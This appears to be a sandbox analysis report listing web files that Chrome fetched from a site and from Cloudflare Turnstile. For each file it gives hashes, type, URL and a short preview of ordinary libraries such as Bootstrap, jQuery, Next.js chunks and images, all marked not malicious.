                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6914],{498:function(e,r,t){t.d(r,{Z:function(){return n}});let n=(0,t(51794).Z)("BarChart",[["line",{x1:"12",x2:"12",y1:"20",y2:"10",key:"1vz5eb"}],["line",{x1:"18",x2:"18",y1:"20",y2:"4",key:"cun8e5"}],["line",{x1:"6",x2:"6",y1:"20",y2:"16",key:"hq0ia6"}]])},34911:function(e,r,t){t.d(r,{Z:function(){return n}});let n=(0,t(51794).Z)("CircleHelp",[["circle",{cx:"12",cy:"12",r:"10",key:"1mglay"}],["path",{d:"M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3",key:"1u773s"}],["path",{d:"M12 17h.01",key:"p32p05"}]])},40318:function(e,r,t){t.d(r,{Z:function(){return n}});let n=(0,t(51794).Z)("GitCompareArrows",[["circle",{cx:"5",cy:"6",r:"3",key:"1qnov2"}],["path",{d:"M12 6h5a2 2 0 0 1 2 2v7",key:"1yj91y"}],["path",{d:"m15 9-3-3 3-3",key:"1lwv8l"}],["circle",{cx:"19",cy:"18",r:"3",key:"1qljk2"}],["path",{d:"M12 18H7a2 2 0 0 1-2-2V9",key:"16sdep"}],["path",{d:"m9 15 3 3-3 3",key:"1m3kbl"}]])},57769:function(e,r,t){t.d(r,{Z:function(){re
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65325)
                                  Category:downloaded
                                  Size (bytes):144877
                                  Entropy (8bit):5.049937202697915
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:450FC463B8B1A349DF717056FBB3E078
                                  SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                  SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                  SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (47520)
                                  Category:downloaded
                                  Size (bytes):47521
                                  Entropy (8bit):5.3981340461317835
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 64 x 75, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3268
                                  Entropy (8bit):7.902562240060532
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A403969E87843E35989D6772A2AC4EED
                                  SHA1:B4E0BE2E6FF0C7111971EE9D67E58954D375F409
                                  SHA-256:D2D8A7CCCA319EB3E5BE224314306C5A9402AC7FB0A5D8D5CFE9B921D615C5DD
                                  SHA-512:027E38B6CB936C0CA605558F5AB0141D871F32DBF3355C163B7E26DF448C1777333127E187583A0E081E349471B29253E44B7D3BD71ADC5FDA511227FADFCDEC
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:.PNG........IHDR...@...K......pq/....PLTELiq..#}.....dz.s[k...v..v..u..{..x........r.... |..v..{.......$..$..#.."..$}..x..{..z..v...W..].x....#t..w..x...P..T..W..Y...#3h...$>o...#z......n..T..Y...%c...a.;r.q...BJy..<`.r...........~.....}..........$.k.....b.....i.....Y..n..g.....l..p..d........{..f.....^.....[.....\..e.....Z.v..y..t.........`....s..r...y......%.......~.._..u.....s...'.q..........}...}.....|.|...n.....v............s........u....................d..........&.........{.....M.....Q..[...!p..n}........T......T.....i....%C.......7...............p...../J.......x.3.....u..f........%.....`..h.........C.....A..!................ej*......q..,3...O.....5...........~..6S.c..s>kD......k.....l..`.o...*6...Ov..@G.....u..........k..;{.'m.T..\..KN..,=...6q.......$o..z~.OUb..............M....<tRNS..............C'.&...aB..b.........l&...3......U...{..c...>.?.....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx...g\....'0A..k_...rwo..f.....I.!b(I.D."MB ....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):170237
                                  Entropy (8bit):5.3205310616207235
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:242D426035589D78C9CB46DB096DB92D
                                  SHA1:F8E9C03CCACEA3C871D08A0C99E6C183B557B302
                                  SHA-256:85B6E591A9DD00B1762256964CD3C8AD6B089807F3F3B97966EBE1728A5F3B24
                                  SHA-512:83766FA9B0E0C081208D67F1DA4EAE19FADC8AB190223689D9EF0F3489BE25163248A16ECAFF891C07B50619920705CF41BA8D0EA1E19FFA0874451A6ED65AB9
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3346],{58629:function(t,e,r){"use strict";function n(){for(var t,e,r=0,n="";r<arguments.length;)(t=arguments[r++])&&(e=function t(e){var r,n,i="";if("string"==typeof e||"number"==typeof e)i+=e;else if("object"==typeof e){if(Array.isArray(e))for(r=0;r<e.length;r++)e[r]&&(n=t(e[r]))&&(i&&(i+=" "),i+=n);else for(r in e)e[r]&&(i&&(i+=" "),i+=r)}return i}(t))&&(n&&(n+=" "),n+=e);return n}r.d(e,{W:function(){return n}}),e.Z=n},29312:function(t,e,r){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),Object.defineProperty(e,"Image",{enumerable:!0,get:function(){return b}});let n=r(43709),i=r(98911),o=r(28598),s=i._(r(82684)),a=n._(r(85202)),l=n._(r(78307)),u=r(64102),c=r(23194),d=r(75608);r(65938);let h=r(13738),p=n._(r(5766)),f={deviceSizes:[640,750,828,1080,1200,1920,2048,3840],imageSizes:[16,32,48,64,96,128,256,384],path:"/_next/image",loader:"default",dangerouslyAllowSVG:!1,unoptimized:!1};function m(t,e,r,n,i,o,s){let a=n
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):115822
                                  Entropy (8bit):5.339647476736472
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:63F6188AADBC850D2D4A39D122E509CF
                                  SHA1:9C1470644430E5842D4ECF25D729B655EAC44486
                                  SHA-256:FC9E598D356EB863D104D59E10DF386419FD3E862B178142856ED7A11ED5C3E5
                                  SHA-512:3B9C11843566E1DAF14DE457A37DE031BEF63C3DBCDDC07F50F940377F01B4F17C379A98682EA46A1DD8FCBB1AD1BD2D42E8EE203133F89BD91A73EE62390492
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[160],{6847:function(e,t,n){function i(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),n.push.apply(n,i)}return n}function r(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?i(Object(n),!0).forEach(function(t){l(e,t,n[t])}):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):i(Object(n)).forEach(function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))})}return e}function o(e){return(o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}function s(e,t){if(!(e instanceof t))throw TypeError("Cannot call a class as a function")}function a(e,t)
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (5485), with no line terminators
                                  Category:dropped
                                  Size (bytes):5485
                                  Entropy (8bit):5.097221384590013
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:73DC12EF4CBA11B4674274120450C6E6
                                  SHA1:3FCAD81FB519E11F417A499FBEC673A3C713ABEC
                                  SHA-256:4F0A36B61458EBA3A8C4AB7E4B0B377EEAB30150BE6770081F41113DBBE6B01F
                                  SHA-512:56E1A6BD49FFE16153699713DD4229C3531CDAF591DCB58C6951F5371EBDCBB14BD51540CECE4B124084B099D1C35DC7CAB09B1B658A0333371697CE9011D0E2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:self.__BUILD_MANIFEST=function(s,a,e,c,t,i,n,d,p,f,u,r,o,h,l,m,b,k,j,g,_,w,y,I,x,v){return{__rewrites:{afterFiles:[{has:[{type:x,key:"o",value:"(?<orgid>\\d*)"},{type:x,key:"p",value:"(?<projectid>\\d*)"}],source:"/monitoring(/?)",destination:void 0}],beforeFiles:[],fallback:[]},"/":[a,e,c,t,i,s,n,f,u,d,r,p,"static/chunks/pages/index-e6029e56a882f5e1.js"],"/404":[s,f,"static/chunks/pages/404-a09bc475828f27c3.js"],"/_error":["static/chunks/pages/_error-e4dc29fbddc2f4e8.js"],"/admin":[a,e,c,t,i,s,n,f,u,d,r,o,p,"static/chunks/pages/admin-7819b6c6b4aa8e48.js"],"/admin/apps":[a,e,c,t,i,s,n,f,u,d,r,o,p,"static/chunks/pages/admin/apps-6d596ab18b5a2955.js"],"/admin/billing":[a,e,c,t,i,s,n,f,u,d,r,o,y,p,"static/chunks/pages/admin/billing-66eb15e1f326157e.js"],"/admin/domain":[a,e,c,t,i,s,n,f,u,d,r,o,p,"static/chunks/pages/admin/domain-1cf86ba899f0f223.js"],"/admin/members":[a,e,c,t,i,s,n,f,u,h,d,r,o,p,"static/chunks/pages/admin/members-c919ffaed4d41f89.js"],"/admin/plan":[a,e,c,t,i,s,n,f,u,d,r,
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):93113
                                  Entropy (8bit):5.151929893437257
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:B7FB4B4FB41308C531064E835C2A326C
                                  SHA1:C82EAD7508C7CEF50F36B3CC9ED15828D84659F4
                                  SHA-256:926043E3D270E1DAE3BE4D1A387E2080DC4A22CBBEA5B8C477B2C85FCF10C103
                                  SHA-512:F4756C3BEFE3A870AB6812737122C6596E773B72C7505F7089934F712FBE0B7CAAD26A1363AC6429152D8ABA0D0D93BD2D7AAE0043F8CB524B6C93A372D04D4F
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6911],{17712:function(e,t,n){n.d(t,{EH:function(){return ty},aV:function(){return tF},p:function(){return tp},tk:function(){return tK}});var o=n(9623),i=n(87218),s=n(98647);let r=function(e){for(var t=0;;t++)if(!(e=e.previousSibling))return t},l=function(e){let t=e.assignedSlot||e.parentNode;return t&&11==t.nodeType?t.host:t},d=null,a=function(e,t,n){let o=d||(d=document.createRange());return o.setEnd(e,null==n?e.nodeValue.length:n),o.setStart(e,t||0),o},c=function(){d=null},h=function(e,t,n,o){return n&&(f(e,t,n,o,-1)||f(e,t,n,o,1))},u=/^(img|br|input|textarea|hr)$/i;function f(e,t,n,o,i){for(;;){if(e==n&&t==o)return!0;if(t==(i<0?0:p(e))){let n=e.parentNode;if(!n||1!=n.nodeType||m(e)||u.test(e.nodeName)||"false"==e.contentEditable)return!1;t=r(e)+(i<0?0:1),e=n}else{if(1!=e.nodeType||"false"==(e=e.childNodes[t+(i<0?-1:0)]).contentEditable)return!1;t=i<0?p(e):0}}}function p(e){return 3==e.nodeType?e.nodeValue.length:e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (32012)
                                  Category:downloaded
                                  Size (bytes):69597
                                  Entropy (8bit):5.369216080582935
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:RIFF (little-endian) data, Web/P image
                                  Category:downloaded
                                  Size (bytes):3408
                                  Entropy (8bit):7.91326365397462
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:77AB6F0A36C0BB16AAEE85A6F9CF2A7A
                                  SHA1:F86F1809BD8EA3F7F9E2870FAB7DA27F7A2BDB8C
                                  SHA-256:CBD496D2B27363858E300BF18B96E3D75AA6E946E6346B0C0750642050C48EFE
                                  SHA-512:09CFC11442CCEA62D07C49BB71C0363FDDC21DC89BD227816020421DE623EECF07378D43149FB80081F32C980962BD4325C4E40E0BC4134909FAC8AF70984D10
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/_next/image?url=https%3A%2F%2Fflair-user-content.s3.us-east-1.amazonaws.com%2Fcm47118yl0201nv0hv9p8h921%2F8VpjJacm47118yl0201nv0hv9p8h9211733146010619.png&w=64&q=100
                                  Preview:RIFFH...WEBPVP8X........?..J..ALPH......C.i...l.B.m#.V.mW..m....^..O.{N.[DL.2.5...H.Qv..6.LB...Kq_q..J..U<,j].#.o...6.SY.9e....I:.........[4....3..F{....0.F...;..qyRA..h.....g.\jT....0....A..t..0&R\.R......t.)adI......O.WU..,.=..?{. ...t).......Q..+C.CkLa....`.4...D'....3V..!:aLV.D...M..1..3`#id...Gz.5..L....(........Q......:..AD....8..........Y...4.[ea2}...U...F.(..0L...1J.0..T+.. .f..Q.w...E.3tL.8^....O.P.....=...}.kz&....J../o.%...i....[.Ip..w.&X............VP8 Z..../...*@.K....%......O.S.Z.?........_t.`?.r5...+......._.7.......]..[.B...O.S........@..........?a.&.d..._.......3.........?.?..j.c.u...S.m..............g.}./...H.n...!.`.W..b.....'......?.{..".K.......j..@.e._.c..........k...-......m~....'...s.'._.?.>.}l~.{..........$.l,.._....O...Xj....w...`..,..l.l...@....L............a.L.A.....W.Q.w"A2..%.a.6.....;..A.D.$..<.H.X.I@...........(.O.....s..Xr..dC.tp..Q....nc.p.z'.o.at}F.....Z.1.M.@...a..W....d.p..[;.....t_<<IGO....cJ....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (45501)
                                  Category:dropped
                                  Size (bytes):62029
                                  Entropy (8bit):5.137200309354228
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:9EB8DB7FF9493D29A33AC7D4695B5D19
                                  SHA1:7FF058A396D2D85307A668797583F1D892899469
                                  SHA-256:40AFE29A5974CBD62A4CBBEB09D2328FF020AD0099C938AA98B0C872FD190805
                                  SHA-512:43830054D0F929750B28CA101A023C67D226C6BD8073E4EBB6552A5F5D77F1DA5D24DA1DF2BCAAE9FEB6F4EE29C1F390766ADF4F911FBB88F7E239D7553E648F
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1509],{68873:function(e,t,n){n.d(t,{Cf:function(){return eT},DK:function(){return e$},DS:function(){return eI},EG:function(){return ef},Jo:function(){return er},K9:function(){return eD},ML:function(){return eC},NB:function(){return eB},Nl:function(){return h},Ov:function(){return eR},P1:function(){return v},QC:function(){return el},S0:function(){return eN},XP:function(){return eo},b5:function(){return ei},bR:function(){return eh},hj:function(){return D},nU:function(){return k},pr:function(){return em},tI:function(){return ed},u9:function(){return ea},vc:function(){return ej},x2:function(){return eA},xh:function(){return q},zK:function(){return eP}});var r=n(9623),o=n(17712),i=n(50936),s=n(87218),a=n(98647),l=n(65963),d=n(81772);function c(e){let{state:t,transaction:n}=e,{selection:r}=n,{doc:o}=n,{storedMarks:i}=n;return{...t,apply:t.apply.bind(t),applyTransaction:t.applyTransaction.bind(t),plugins:t.plugins,schema:t.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (32065)
                                  Category:dropped
                                  Size (bytes):85578
                                  Entropy (8bit):5.366055229017455
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):622257
                                  Entropy (8bit):5.366891688808852
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:0482171B44ABCE88C4D4D5FD8B75D82B
                                  SHA1:148326BA6249C18515200CF8E27E5ACEEE217A5C
                                  SHA-256:9F67E910C1C6D2C167CF1AEB269292EEE3065829E10C3E1CE6D3BDBBB57EC4A5
                                  SHA-512:C19B86ADB6EF7134C53B4FFA0189353B9CECE28D5C04092A0D39CE38EFF41D0D1284AFDB59CC82870E93D142BEBC7D057C0A9EFA53566A17C7C1AC11015F7BC2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{53212:function(t){"use strict";let e=(t,e,n)=>{let r=e<0?t.length+e:e;if(r>=0&&r<t.length){let r=n<0?t.length+n:n,[o]=t.splice(e,1);t.splice(r,0,o)}},n=(t,n,r)=>(e(t=[...t],n,r),t);t.exports=n,t.exports.mutate=e},11739:function(t,e,n){var r;!function(o){"use strict";var i,a=1e9,c={precision:20,rounding:4,toExpNeg:-7,toExpPos:21,LN10:"2.302585092994045684017991454684364207601101488628772976033327900967572609677352480235997205089598298341967784042286"},u=!0,l="[DecimalError] ",s=l+"Invalid argument: ",f=l+"Exponent out of range: ",p=Math.floor,d=Math.pow,h=/^(\d+(\.\d*)?|\.\d+)(e[+-]?\d+)?$/i,y=1e7,v=7,g=9007199254740991,m=p(1286742750677284.5),b={};function x(t,e){var n,r,o,i,a,c,l,s,f=t.constructor,p=f.precision;if(!t.s||!e.s)return e.s||(e=new f(t)),u?T(e,p):e;if(l=t.d,s=e.d,a=t.e,o=e.e,l=l.slice(),i=a-o){for(i<0?(r=l,i=-i,c=s.length):(r=s,o=a,c=l.length),i>(c=(a=Math.ceil(p/v))>c?a+1:c+1)&&(i=c,r.length=1),r.reverse();i--
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (1572)
                                  Category:downloaded
                                  Size (bytes):5973
                                  Entropy (8bit):5.393222621370193
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:84B4D2FB3E351B07EB44BE9076C40C3F
                                  SHA1:F798336EF7F04FB213B51E7D32686B8E682ADAD9
                                  SHA-256:1C93A9EC1B17079D7F97C8176C2AB7807D10C133EFDD87FE2CCC233B152CA399
                                  SHA-512:8A307DCC1D60710FACB22BE693AFE2FFBFD332513FAD153EEAD776DED703A365F494FB1B46B8BCF00D382523C4B8BCA1E93612ED307519C5DF709375132D03F8
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (50758)
                                  Category:dropped
                                  Size (bytes):51039
                                  Entropy (8bit):5.247253437401007
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 46 x 1, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):61
                                  Entropy (8bit):4.002585360278503
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:3F39A887430583FA6F75A0D4B208D9CC
                                  SHA1:E7341FC015A8C79DFE01ED8A7C9BDC3CEB1ABDCF
                                  SHA-256:84037A060F168F740BE099AE8CAAE4913DDB1BB1887515B0DC447DC0EABF13DA
                                  SHA-512:7A178CB95AF7878D561F5296296C376F095E56BA17E7E0127F25968F6434AEB36F74702448607A57BCF6029D8E62F4B519F07D9640B872A9BAE8B4A3F3C44023
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ff6ab2a49b24283/1736449211695/oUunw6qDk3nKC2c
                                  Preview:.PNG........IHDR..............!......IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (6584), with no line terminators
                                  Category:downloaded
                                  Size (bytes):6584
                                  Entropy (8bit):5.3512081981670505
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:BC8AC6BFACDE7D140399C7E9076509E5
                                  SHA1:2157923BC137F3C239D8333DE63450DAB116C06F
                                  SHA-256:76400D84317E94DA30B1A5EFB664D1B27B103F96D43017743ED9769E4776FBE0
                                  SHA-512:A6D2DFABCA02424DBD0FAECF0DC85C3D7660264FB7D5B179B83D13F9DDA3A4222D6EDCD02A42AFDA545C741532E2A45745F9790FFF25042DD81F72B393AE526C
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://app.whirr.co/_next/static/chunks/2691-18776c00e10fcb0b.js
